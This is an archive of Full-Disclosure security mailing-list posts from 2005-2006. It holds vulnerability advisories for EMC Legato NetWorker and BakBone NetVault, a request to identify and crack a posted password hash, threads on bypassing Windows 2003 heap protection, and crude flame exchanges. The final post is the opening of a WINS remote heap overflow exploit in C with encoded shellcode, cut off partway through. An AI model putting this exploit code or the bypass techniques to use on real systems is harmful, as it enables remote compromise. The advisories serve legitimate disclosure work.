[Full-disclosure] iDefense Security Advisory 01.17.06: Cisco Systems IOS 11 Web Service CDP Status Page Code Injection Vulnerability

tp://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 01.17.06: EMC Legato Networker nsrd.exe Heap Overflow Vulnerability


EMC Legato Networker nsrd.exe Heap Overflow Vulnerability

iDefense Security Advisory 01.17.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=373
January 17, 2006

I. BACKGROUND

EMC Legato NetWorker is a cross-platform backup and recovery
application.

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in EMC Corp.'s
Legato Networker allows attackers to execute arbitrary code on Windows
platforms.

The vulnerability specifically exists due to improper handling of
malformed RPC requests to RPC program number 390109. When such a request
is sent by an attacker, it is possible to overwrite portions of heap
memory, thus leading to arbitrary code execution.

III. ANALYSIS

Successful exploitation allows a remote attacker to gain access to a
targeted machine. As nsrd.exe is installed on backup client machines
and server machines, an attacker may rapidly compromise a network using
this vulnerability.

IV. DETECTION

iDefense has confirmed this vulnerability in Networker 7.2 build 172.
All previous versions are suspected vulnerable.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

"Complete resolutions to the vulnerabilities are available today in
NetWorker 7.1.4 and 7.3. EMC has created a hot-fix to protect against
vulnerabilities for 7.2.1 customers.  No fixes are planned for previous
NetWorker releases."

"These remedies are available for download at:"

 http://www.legato.com/support/websupport/product_alerts/011606_NW.htm

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3658 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/17/2005 Initial vendor notification
11/17/2005 Initial vendor response
01/17/2006 Coordinated public disclosure

IX. CREDIT

Jo Goossens is credited with the discovery of this vulnerability.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 01.17.06: EMC Legato Networker nsrexecd.exe Heap Overflow Vulnerability


EMC Legato Networker nsrexecd.exe Heap Overflow Vulnerability

iDefense Security Advisory 01.17.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=374
January 17, 2006

I. BACKGROUND

EMC Legato NetWorker is a cross-platform backup and recovery
application.

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in EMC Corp.'s
Legato Networker allows attackers to execute arbitary code on windows
platforms.

The vulnerability specifically exists due to improper handling of
malformed RPC requests to RPC program number 390113. When such a request
is sent by an attacker, it is possible to overwrite portions of heap
memory, thus leading to arbitrary code execution by way of a function
pointer overwrite. If an attacker can populate memory so that his data
is in a predictable location, arbitrary code execution is possible. It
is possible to populate memory in several ways, including by utilizing
memory leaks.

III. ANALYSIS

Successful exploitation allows a remote attacker to gain access to a
targetted machine. As nsrd.exe is installed on backup client machines
as well as server machines, an attacker may rapidly compromise a
network using this vulnerability.

IV. DETECTION

iDefense has confirmed this vulnerability in Networker 7.2 build 172.
All previous versions are suspected vulnerable.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

"Complete resolutions to the vulnerabilities are available today in
NetWorker 7.1.4 and 7.3.  EMC has created a hot-fix to protect against
vulnerabilities for 7.2.1 customers.  No fixes are planned for previous
NetWorker releases."

"These remedies are available for download at:"

http://www.legato.com/support/websupport/product_alerts/011606_NW.htm

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3658 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/17/2005 Initial vendor notification
11/17/2005 Initial vendor response
01/17/2006 Coordinated public disclosure

IX. CREDIT

Jo Goossens is credited with the discovery of this vulnerability.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 01.17.06: EMC Legato Networker nsrd.exe DoS Vulnerability


EMC Legato Networker nsrd.exe DoS Vulnerability

iDefense Security Advisory 01.17.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=375
January 17, 2006

I. BACKGROUND

EMC Legato NetWorker is a cross-platform backup and recovery
application.

II. DESCRIPTION

Remote exploitation of a denial of service vulnerability in EMC Corp.'s
Legato Networker allows attackers to crash the nsrd service.

The vulnerability specifically exists due to improper handling of
malformed RPC requests to RPC program number 390109. By sending such a
request, an attacker is able to cause a NULL pointer to be used as the
base in a memory reference, which leads to a crash of the service. The
daemon will crash on a NULL pointer dereference as no exception handlers
are invoked which might allow it to recover.

III. ANALYSIS

Successful exploitation allows a remote attacker to crash the nsrd.exe
process.

IV. DETECTION

iDefense has confirmed this vulnerability in Networker 7.2 build 172.
All previous versions are suspected vulnerable.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

"Complete resolutions to the vulnerabilities are available today in
NetWorker 7.1.4 and 7.3.  EMC has created a hot-fix to protect against
vulnerabilities for 7.2.1 customers.  No fixes are planned for previous
NetWorker releases."

"These remedies are available for download at:"

 http://www.legato.com/support/websupport/product_alerts/011606_NW.htm

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3659 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/17/2005 Initial vendor notification
11/17/2005 Initial vendor response
01/17/2006 Coordinated public disclosure

IX. CREDIT

Jo Goossens is credited with the discovery of this vulnerability.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Practical Wireless Deployment Methodology (PWDM)

2006-01-18 Thread [EMAIL PROTECTED]

Hi Everyone,

We've launched a hardware-neutral wireless deployment/upgrading 
methodology at http://www.pwdm.net and would like some feedback on 
whether it is useful to you and how we can make it more so.

The PWDM (Practical Wireless Deployment Methodology) is a practical, 
vendor-independent methodology which is intended to help people who 
are tasked with deploying, upgrading, maintaining & securing 802.11-
based WLANs, irrespective of whether they are private (SOHO, 
enterprise, home) or public (hotspots) in nature. 

The methodology comprises the following steps:
* Deployment Analysis
* Contractual Negotiation
* Deployment Tactical Planning
* Deployment Procedural Rollout
* Supporting Infrastructure Rollout
* AP Security Issues
* Layer 3 Mitigation Strategies
* Management Overlay
* Gateway Security
* UAT & Commissioning

If you're interested in taking a look, you can download the current 
version of the PWDM (ver 1.4) at http://www.pwdm.net  

Thanks & Regards,
J.Ho
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Hash Type?

2006-01-19 Thread [EMAIL PROTECTED]

Can someone please tell me if these are DES hashes, or if they could
be oracle hashes? I cannot get JTR to crack them, which leades me to
believe they may not be DES. Any help please?

Username: UCN016
Password Hash: 8F789BA55BA187380BA1
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Security Bug in MSVC

2006-01-19 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
and me I think most FD members are desesperate of such newcomer
comments, you have nothing to say interesting about his work he's
doing before you were born.
 
redsand wrote:
>
>
> i think the author of this advisory is desperate for advisories or
> attention.
>
> either way he needs to open a disassembler and work on something
> else.
>
> Pavel Kankovsky wrote:
>
>> On Tue, 17 Jan 2006, Morning Wood wrote:
>>
>>
>>
>>> extract, and open hello.dsw click "batch build, build" or
>>> "rebuild all" code will execute ( calc.exe and notepad.exe used
>>> as an example )
>>>
>>
>> What's the point of building a bunch of sources unless 1. you
>> trust their author, or 2. you have made sure their is nothing
>> malicious there?
>>
>> When you build an executable from untrusted sources, you get an
>> untrusted executable. Either you run it and you're screwed
>> anyway, or you don't run it and you wasted your time building it.
>>
>>
>> (Indeed, there are some marginal cases like when you want to
>> build an executable file intended to run on someone else's
>> computer...)
>>
>> --Pavel Kankovsky aka Peak  [ Boycott
>> Microsoft--http://www.vcnet.com/bms ] "Resistance is futile. Open
>> your source code and prepare for assimilation."
>>
>> ___ Full-Disclosure -
>> We believe in it. Charter:
>> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
>> sponsored by Secunia - http://secunia.com/
>>
>>
>
> ___ Full-Disclosure -
> We believe in it. Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
> sponsored by Secunia - http://secunia.com/
>
>
>

7
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBQ9AV6a+LRXunxpxfAQIl+A//XQq/5cyAlFC1SPGGqtQ0dG+S/NwGUzzv
Z7ztPO91djMBVqHq1sNKwpwGwvl9KDXANuxl+lSRpW4KaoXIfORFhbO+jFHkkENN
mcLVmLVuzDzO9a5RPCSb1NdIvPMSulJCV+4uoZyc45qG1Vw6qNugISnZm8R2CZk+
+V+VqB8cpl34JdL7tfPPn5Gcs4QRJiNcFfFsT0duG1p2EGuLzbvNqgqPcISSL+MZ
fNDrbRHk+PpkIz0Z1bxdAt9v/ijJ/c+vWASa0jO9tPtUEdsYfJYFC2LOUpw659rS
DAiMxxKPPt2tFR7n4PyIridzrYRNd9UrwbMsiTaD8aOIIZHmhac3+vfVbOv+zOEz
L2s8Sv5FanlsEI/zcK5DCSL6aRAVY98Uhq796qFrwAGkmCP1umfQGb/dFn+hmqd/
4WwA/Qzv9vBBRqKUssiASwock5s/Vpb9y9OdPjkcN1QYVOm1RxPaA8uFKRfZ34v1
sFGzefTOo4xYFuuPuXB+Uz2/yDhvrPuqsiQdvtz7jQ56NxTQmxuLN2fy5Uh1Pc7L
1bnvW5FSFAboD95uaIfFvzu5oclQnXLJBgCjQCVjhXR1FUX/vOc+8ydcF5dUiLkk
+iOMKvOvyzgGwuXR8z6tTXkPpEtJkb4xSej/JFHHpcUwSK/teUlHE6eODczAZtop
S4l5HkauGb0=
=Yi5I
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Security Bug in MSVC

2006-01-19 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
not up to you.

redsand wrote:
>
>
> like selling all my M$ Excel exploits
>
> [EMAIL PROTECTED] wrote:
>
> and me I think most FD members are desesperate of such newcomer
> comments, you have nothing to say interesting about his work he's
> doing before you were born.
>
> redsand wrote:
>
>
>>>> i think the author of this advisory is desperate for
>>>> advisories or attention.
>>>>
>>>> either way he needs to open a disassembler and work on
>>>> something else.
>>>>
>>>> Pavel Kankovsky wrote:
>>>>
>>>>
>>>>> On Tue, 17 Jan 2006, Morning Wood wrote:
>>>>>
>>>>>
>>>>>
>>>>>
>>>>>> extract, and open hello.dsw click "batch build, build" or
>>>>>>  "rebuild all" code will execute ( calc.exe and
>>>>>> notepad.exe used as an example )
>>>>>>
>>>>>>
>>>>> What's the point of building a bunch of sources unless 1.
>>>>> you trust their author, or 2. you have made sure their is
>>>>> nothing malicious there?
>>>>>
>>>>> When you build an executable from untrusted sources, you
>>>>> get an untrusted executable. Either you run it and you're
>>>>> screwed anyway, or you don't run it and you wasted your
>>>>> time building it.
>>>>>
>>>>>
>>>>> (Indeed, there are some marginal cases like when you want
>>>>> to build an executable file intended to run on someone
>>>>> else's computer...)
>>>>>
>>>>> --Pavel Kankovsky aka Peak  [ Boycott
>>>>> Microsoft--http://www.vcnet.com/bms ] "Resistance is
>>>>> futile. Open your source code and prepare for
>>>>> assimilation."
>>>>>
>>>>> ___
>>>>> Full-Disclosure - We believe in it. Charter:
>>>>> http://lists.grok.org.uk/full-disclosure-charter.html
>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>>
>>>>>
>>>>>
>>>> ___
>>>> Full-Disclosure - We believe in it. Charter:
>>>> http://lists.grok.org.uk/full-disclosure-charter.html Hosted
>>>> and sponsored by Secunia - http://secunia.com/
>>>>
>>>>
>>>>
>>>>
>
> 7
>>>
>
>>>
>
>
>
>
>
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBQ9AbAK+LRXunxpxfAQKNyhAAhtQnjmz90rgrBCOwHHuSkMaRtszPbIv3
DkE0u0reWJLkqXmGUEPJ1KZ3IvxYIbwOTT2qfSFwJYRytu9vhhgNTkOPbezq98Gu
SwSsSgBkC1bKzxuRsta9ChUdBg/ajoKJ5tw7xOxtgMhfNWkbx5iDsu8jCN20NuJQ
pdF5Vds49jlpv3Bu1aUcmDDbI9jPGEtxWP8ZiX7OT3WTJTl8LtE6WmUMQ73J4msL
6rb3bfJod827jCxGMoYxhL4PV9kpIYSzwmkjXjcNw4Kou3MTqfUAXVaWd82cyfq2
cRhCBhwcYQXoCMV9H8uk/HoNLhlJMUSCA1WPyTApXe3QDokhUWVMrzkGB1fcgJVF
3yoXaQ1faIdK7wT1r185p/MH0FQsPDhJlHfrF9KbetVX7+6JnWG1sNrLIqVZP2ss
5Pvvevc06UjYmNJ4OhwdfdCoFYRFBX+Ibd60wTmr5zEweBE/z69bUKeQXBrU9sDj
Ep0dtVOIl2aSkE+n+FnEtquaWz+JQWEBDh+IS666BKXutcKWjTYV5rF1jkcC6nNX
TVm5Cyg7FL6oTWtRzR/6Cdi3+NNWRSu/E9pCdSuNatYP+IL1+22y5Ge6TQkPkBVp
8HzCBggh1Tnwy6qnxMbt+yJw4Aq7Eqf02dwlYA0Nup47V0OQ5eutiInG0CINxt0d
3dq8HxbaM80=
=AXCW
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Lameness (with guidelines)

2005-03-24 Thread [EMAIL PROTECTED]

http://lists.grok.org.uk/full-disclosure-charter.html

quote:
Full-Disclosure Acceptable Content

Any information pertaining to vulnerabilities is acceptable, for instance
announcement and discussion thereof, exploit techniques and code, related
tools and papers, and other useful information.

Gratuitous advertisement, product placement, or self-promotion is forbidden.
Disagreements, flames, arguments, and off-topic discussion should be taken
off-list wherever possible.

Humour is acceptable in moderation, providing it is inoffensive. Politics
should be avoided at all costs.

Members are reminded that due to the open nature of the list, they should
use discretion in executing any tools or code distributed via this list.

-
class101
Jr. Researcher
Hat-Squad.com
-
- Original Message -
From: "David Chastain" <[EMAIL PROTECTED]>
To: "Todd Towles" <[EMAIL PROTECTED]>
Cc: 
Sent: Thursday, March 24, 2005 3:41 PM
Subject: RE: [Full-disclosure] Lameness


> It sounds then like its reputation has already been labeled??? Is there a
moderator that can take control a little and maybe get FD back on the
right track
>
> On Thursday, March 24, 2005, at 05:52AM, Todd Towles
<[EMAIL PROTECTED]> wrote:
>
> >You haven't been here too long if this is starting to anger you..welcome
> >to FD. Google to find the other list...
> >
> >> -----Original Message-
> >> From: [EMAIL PROTECTED]
> >> [mailto:[EMAIL PROTECTED] On Behalf
> >> Of Anders Breindahl
> >> Sent: Wednesday, March 23, 2005 5:36 PM
> >> To: full-disclosure@lists.grok.org.uk
> >> Subject: Re: [Full-disclosure] Asshat coders
> >>
> >> I actually wonder whether this list has become the hangout
> >> place for all lameness of seclists.
> >>
> >> Any plan of action, or should I too just attempt learning to
> >> ignore this? Who was that guy who ran a moderated version of
> >> this list again?
> >>
> >> Regards, Anders Breindahl.
> >>
> >> On Thursday 24 March 2005 00:19, Vladamir wrote:
> >> > Can you guys take this childish shit elsewhere Thanks!
> >> >
> >> > VeNoMouS wrote:
> >> > > ya know im going to mirror your code on as many sites as
> >> i can now,
> >> > > since your such a cock.
> >> ...
> >> > >> VeNoMouS venom at gen-x.co.nz wrote:
> >> > >>> We got this email @ milw0rm today, htf can some one bitch this
> >> > >>> much for posting their exploit I think its kinda
> >> retarded that
> >> > >>> they release it but it MUST come from only there
> >> website, GOT M$ tactics??
> >> ...
> >> > >> rofl m$ tactics, thats sure thing, i want to spent rest
> >> of my life
> >> > >> filled with springsteens and wine.
> >> ...
> >> > >> KF (lists) kf_lists at digitalmunition.com wrote:
> >> > >>> I think he has sand in his vagina.
> >> > >>> -KF
> >> ...
> >> > >> kf: oh, sorry kf, i didnt post it to 0dd first ;(
> >> > >>ever heard of reinforced condoms? gosh, dont spread rumours
> >> > >>about our sexual problems in public, it hurts my
> >> feelings for you.
> >> > >>
> >> > >> and just for the record, anyone else keeping krad.c
> >> mirrored please
> >> > >> rm it, the reason is that im in fact incredible asshole and i'd
> >> > >> rather prefer having it traded by kids on #darknet for
> >> like half a
> >> > >> year, just like sk2.
> >> > >> ___
> >> ___
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >>
> >___
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Question: Heap Overflows on 2k3/SP2

2005-03-27 Thread [EMAIL PROTECTED]

Do you know a reliable way to bypass the heap protection present in w2k3 ?
I have troubles to understand why my heap overflows exploit (own discovery)
isnt working fine on 2k3.

If you are familiar exploiting them, explain me how to...
look at the bottom to show what the check looks like:

> on 2k3: (on SP2 its quite same I think with the check register EDI
replaced
> by EDX)
>
> 77F370ED   8B02 MOV EAX,DWORD PTR DS:[EDX]
> 77F370EF   8985 F0FE   MOV DWORD PTR SS:[EBP-110],EAX
> 77F370F5   8B4A 04MOV ECX,DWORD PTR DS:[EDX+4]
> 77F370F8   898D 68FE   MOV DWORD PTR SS:[EBP-198],ECX
> 77F370FE   8B39 MOV EDI,DWORD PTR DS:[ECX]
> 77F37100   3B78 04CMP EDI,DWORD PTR DS:[EAX+4] <=
protection
> 77F37103   0F85 F4FC  JNZ ntdll.77F36DFD
> 77F37109   3BFACMP EDI,EDX  <= protection
> 77F3710B   0F85 ECFC JNZ ntdll.77F36DFD
> 77F37111   8901  MOV DWORD PTR DS:[ECX],EAX
> 77F37113   8948 04 MOV DWORD PTR DS:[EAX+4],ECX
>
As you can see , It's not possible to use EAX as a what and ECX as a where
pointing to UEF because of the previous check.
I think I have read somewhere a method about the lookaside table, If you
are familiar with it , thanx to explain it to me ;)
>
> -
> class101
> Jr. Researcher
> Hat-Squad.com
> -


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Question: Heap Overflows on 2k3/SP2

2005-03-28 Thread [EMAIL PROTECTED]

This paper itself isn't so good , it is a dupe of /csw04-Oded+Connover.ppt
the 2 codes in appendice are new yes for SP2/2k3 but as usual a paper
describes what is in appendice, and unfortunely in this one nop, they
copypaste what wrote oded and connover

Thanx anyway

-
class101
Jr. Researcher
Hat-Squad.com
-
- Original Message -
From: "Nick Eoannidis" <[EMAIL PROTECTED]>
To: 
Sent: Monday, March 28, 2005 1:55 PM
Subject: Re: [Full-disclosure] Question: Heap Overflows on 2k3/SP2


> class 101, this may help you
>
> http://www.maxpatrol.com/defeating-xpsp2-heap-protection.htm
>
> good luck
>
> Nikon
>
> Xillion Computers
> "Trust your Technolust"
> http://www.xillioncomputers.com
> http://www.technolusthosting.com
> [EMAIL PROTECTED]
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Question: Heap Overflows on 2k3/SP2

2005-03-29 Thread [EMAIL PROTECTED]

very useful, thanx you a lot for the link :)


-
class101
Jr. Researcher
Hat-Squad.com
-
- Original Message -
From: "m conover" <[EMAIL PROTECTED]>
To: 
Sent: Tuesday, March 29, 2005 2:16 AM
Subject: [Full-disclosure] Re: Question: Heap Overflows on 2k3/SP2


> Perhaps this one will be more useful:
> http://www.cybertech.net/~sh0ksh0k/xpsp2_heap_exploitation
> The presentation material was never formally released, but it was
presented
> at SyScan in Dec 2004
>
> >This paper itself isn't so good , it is a dupe of
/csw04-Oded+Connover.ppt
> >the 2 codes in appendice are new yes for SP2/2k3 but as usual a paper
> >describes what is in appendice, and unfortunely in this one nop, they
> >copypaste what wrote oded and connover
> >
> >Thanx anyway
> >
> >-
> >class101
> >Jr. Researcher
> >Hat-Squad.com
> >-
> >- Original Message -
> >From: "Nick Eoannidis" 
> >To: 
> >Sent: Monday, March 28, 2005 1:55 PM
> >Subject: Re: [Full-disclosure] Question: Heap Overflows on 2k3/SP2
> >
> >
> > > class 101, this may help you
> > >
> > > http://www.maxpatrol.com/defeating-xpsp2-heap-protection.htm
> > >
> > > good luck
> > >
> > > > Nikon
> > >
> > > Xillion Computers
> > > "Trust your Technolust"
> > > http://www.xillioncomputers.com
> > > http://www.technolusthosting.com
> > > nikon at xillioncomputers.com
>
> _
> On the road to retirement? Check out MSN Life Events for advice on how to
> get there! http://lifeevents.msn.com/category.aspx?cid=Retirement
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] BakBone products multiple vulnerabilities

2005-04-01 Thread [EMAIL PROTECTED]

The Hat-Squad has found 2 exploitable vulnerabilities affecting BakBone
NetVault Backup Software 6.x/7.x
At this moment writing this advisory, no decent communications were
established with the BakBone technicians, we recommand to set strict ACL
rules on the files configure.cfg and to filter all incoming connections to
20031/tcp and 20031/udp.

class101.org/netv-locsbof.pdf
class101.org/netv-remhbof.pdf

-
class101
Jr. Researcher
Hat-Squad.com
-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] BakBone Netvault 6.x/7.x Remote Heap Buffer Overflow

2005-04-01 Thread [EMAIL PROTECTED]

According to their website (bakbone.com),
BakBone Netvault 6.x/7.x is a professional backup software with several
offices in the world and some pro customers as Apple, AT&T, Pirelli, LMU,
HP, NIP,NASA, etc

A Vulnerability exists in the netvault server

advisory: class101.org/netv-remhbof.pdf
poc: class101.org/36/55/op.php

recommendation: to block incoming connections to 20031/tcp, 20031/udp
-
class101
Jr. Researcher
Hat-Squad.com
-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] BakBone Netvault 6.x/7.x Local Stack Buffer Overflow

2005-04-01 Thread [EMAIL PROTECTED]

According to their website (bakbone.com),
BakBone Netvault 6.x/7.x is a professional backup software with several
offices in the world and some pro customers as Apple, AT&T, Pirelli, LMU,
HP, NIP,NASA, etc

A Vulnerability exists in the configure.cfg file

advisory: class101.org/netv-locsbof.pdf
poc: class101.org/36/55/op.php

recommendation: to set stricts acl rules on this file.
-
class101
Jr. Researcher
Hat-Squad.com
-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] BakBone NetVault 6.x/7.x Local Stack Buffer Overflow

Last Recall of a NetVault vulnerability still unpatched

http://class101.org/netv-locsbof.pdf

-
class101
Jr. Researcher
Hat-Squad.com
-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Microsoft Windows Internet Name Service (WINS) Remote Heap Overflow Exploit


class101.org for a clean code.

/*
   Windows Internet Name Service (WINS)
   Remote Heap Buffer Overflow
   
   

Advisory credits:


  Nicolas Waisman of Immunity Inc. (www.immunitysec.com)

Advisory link:


  immunitysec.com/downloads/instantanea.pdf

Fix:


  support.microsoft.com/kb/870763 (MS04-045)

Exploit method:


  PEB (RtlEnterCriticalSection)

Tested Working:


  Win2k SP4  Server ENGLISH (should be all langages, not sure)
  Win2k SP4 Advanced Server ENGLISH (should be all langages, not sure)
   (KB870763 removed!)

Note:


  A HAT-SQUAD view on this hole; exploitable and remaining critic for
Windows 2000.
  May need update for Windows 2003 due to the different
  structure of wins.exe in it but the bug remain exploitable
  with no KB870763 of course
  If you look closely at my code , you will notice two overwrites,
  this is the difference between Server <=> Advanced Server, with an
  el8 pad, repair, you catch them both.

Greetings:


  All guys at hat-squad and metasploit
  also #n3ws at EFnet, useful to keep an eye on security.. (50 rsslinks)
  and thanx you leku.


  -=[®class101.org]=-

*/

#include 
#include 
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#endif

char scode1[]=
"\x33\xC9\x83\xE9"
"\xAF\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xBB"
"\x1E\xD3\x6A\x83\xEB\xFC\xE2\xF4\x47\x74\x38\x25\x53\xE7\x2C\x95"
"\x44\x7E\x58\x06\x9F\x3A\x58\x2F\x87\x95\xAF\x6F\xC3\x1F\x3C\xE1"
"\xF4\x06\x58\x35\x9B\x1F\x38\x89\x8B\x57\x58\x5E\x30\x1F\x3D\x5B"
"\x7B\x87\x7F\xEE\x7B\x6A\xD4\xAB\x71\x13\xD2\xA8\x50\xEA\xE8\x3E"
"\x9F\x36\xA6\x89\x30\x41\xF7\x6B\x50\x78\x58\x66\xF0\x95\x8C\x76"
"\xBA\xF5\xD0\x46\x30\x97\xBF\x4E\xA7\x7F\x10\x5B\x7B\x7A\x58\x2A"
"\x8B\x95\x93\x66\x30\x6E\xCF\xC7\x30\x5E\xDB\x34\xD3\x90\x9D\x64"
"\x57\x4E\x2C\xBC\x8A\xC5\xB5\x39\xDD\x76\xE0\x58\xD3\x69\xA0\x58"
"\xE4\x4A\x2C\xBA\xD3\xD5\x3E\x96\x80\x4E\x2C\xBC\xE4\x97\x36\x0C"
"\x3A\xF3\xDB\x68\xEE\x74\xD1\x95\x6B\x76\x0A\x63\x4E\xB3\x84\x95"
"\x6D\x4D\x80\x39\xE8\x4D\x90\x39\xF8\x4D\x2C\xBA\xDD\x76\xD3\x0F"
"\xDD\x4D\x5A\x8B\x2E\x76\x77\x70\xCB\xD9\x84\x95\x6D\x74\xC3\x3B"
